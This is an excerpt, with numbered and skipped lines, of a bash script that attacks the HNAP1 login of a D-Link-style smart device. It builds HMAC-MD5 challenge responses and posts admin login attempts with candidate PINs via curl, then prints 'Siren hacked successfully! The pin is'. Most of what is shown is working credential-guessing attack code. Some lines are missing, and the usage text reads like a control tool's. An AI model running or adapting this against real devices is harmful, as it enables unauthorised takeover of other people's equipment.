2 #modify next two line for your DSP-W215
6 #do not modify after this line if you don't know what you are doing
9 echo -e "\nUsage: $(basename $0) [OPTION]"
11 echo -e "\t--getstate"
13 echo -e "\t--noise SoundType(1-6) Volume(0-100) Duration(??)"
19 echo -n "$data" | openssl dgst "-md5" -hmac "$key" -binary | xxd -ps -u
22 contentType="Content-Type: text/xml; charset=utf-8"
23 soapLogin="SOAPAction: \"http://purenetworks.com/HNAP1/Login\""
27 head="<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body>"
28 end="</soap:Body></soap:Envelope>"
30 message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
31 loginrequest="$head$message$end"
37 ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
40 opt=`echo -n "$ret" | grep -Po "(?<=<$1>).*(?=</$1>)"`
44 echo -e "Current pin: $PIN"
46 challenge=`getResult Challenge`
47 cookie="Cookie: uid=`getResult Cookie`"
48 publickey="`getResult PublicKey`$PIN"
49 echo -e "Public key: $publickey"
50 privatekey=`hash_hmac "$challenge" "$publickey"`
51 password=`hash_hmac "$challenge" "$privatekey"`
53 auth_str="$timestamp\"http://purenetworks.com/HNAP1/Login\""
54 auth=`hash_hmac "$auth_str" "$privatekey"`
55 hnap_auth="HNAP_AUTH: $auth $timestamp"
57 message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>login</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
59 login="$head$message$end"
62 mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
65 status=`echo -n "$mret" | grep -Po "(?<=<LoginResult>).*(?=</LoginResult>)"`
66 echo -e "Status: $status\n\n"
67 if [ $status = "success" ]
69 echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"